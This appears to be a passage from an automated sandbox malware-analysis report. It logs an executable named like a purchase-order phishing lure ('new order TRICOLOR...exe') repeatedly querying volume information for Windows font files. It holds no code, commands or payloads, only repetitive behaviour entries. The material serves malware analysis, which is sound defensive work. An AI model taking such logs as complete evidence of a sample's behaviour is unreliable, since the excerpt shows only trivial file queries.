                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
Queries volume information (behavior: VolumeInformation) for the following files, all under C:\Windows\Fonts:
C:\Windows\Fonts\PAPYRUS.TTF
C:\Windows\Fonts\MISTRAL.TTF
C:\Windows\Fonts\LHANDW.TTF
C:\Windows\Fonts\ITCKRIST.TTF
C:\Windows\Fonts\JUICE___.TTF
C:\Windows\Fonts\FRSCRIPT.TTF
C:\Windows\Fonts\FREESCPT.TTF
C:\Windows\Fonts\BRADHITC.TTF
C:\Windows\Fonts\OUTLOOK.TTF
C:\Windows\Fonts\BKANT.TTF
C:\Windows\Fonts\ANTQUAI.TTF
C:\Windows\Fonts\ANTQUAB.TTF
C:\Windows\Fonts\ANTQUABI.TTF
C:\Windows\Fonts\GARA.TTF
C:\Windows\Fonts\GARAIT.TTF
C:\Windows\Fonts\GARABD.TTF
C:\Windows\Fonts\MTCORSVA.TTF
C:\Windows\Fonts\GOTHIC.TTF
C:\Windows\Fonts\GOTHICI.TTF
C:\Windows\Fonts\GOTHICB.TTF
C:\Windows\Fonts\GOTHICBI.TTF
C:\Windows\Fonts\ALGER.TTF
C:\Windows\Fonts\BASKVILL.TTF
C:\Windows\Fonts\BAUHS93.TTF
C:\Windows\Fonts\BELL.TTF
C:\Windows\Fonts\BELLI.TTF
C:\Windows\Fonts\BELLB.TTF
C:\Windows\Fonts\BRLNSR.TTF
C:\Windows\Fonts\BRLNSDB.TTF
C:\Windows\Fonts\BRLNSB.TTF
C:\Windows\Fonts\BERNHC.TTF
C:\Windows\Fonts\BOD_PSTC.TTF
C:\Windows\Fonts\BRITANIC.TTF
C:\Windows\Fonts\BROADW.TTF
C:\Windows\Fonts\BRUSHSCI.TTF
C:\Windows\Fonts\CALIFR.TTF
C:\Windows\Fonts\CALIFI.TTF
C:\Windows\Fonts\CALIFB.TTF
C:\Windows\Fonts\CENTAUR.TTF
C:\Windows\Fonts\CHILLER.TTF
C:\Windows\Fonts\COLONNA.TTF
C:\Windows\Fonts\COOPBL.TTF
C:\Windows\Fonts\FTLTLT.TTF
C:\Windows\Fonts\HARLOWSI.TTF
C:\Windows\Fonts\HARNGTON.TTF
C:\Windows\Fonts\HTOWERT.TTF
C:\Windows\Fonts\HTOWERTI.TTF
C:\Windows\Fonts\JOKERMAN.TTF
C:\Windows\Fonts\KUNSTLER.TTF
C:\Windows\Fonts\LBRITE.TTF
C:\Windows\Fonts\LBRITED.TTF
C:\Windows\Fonts\LBRITEI.TTF
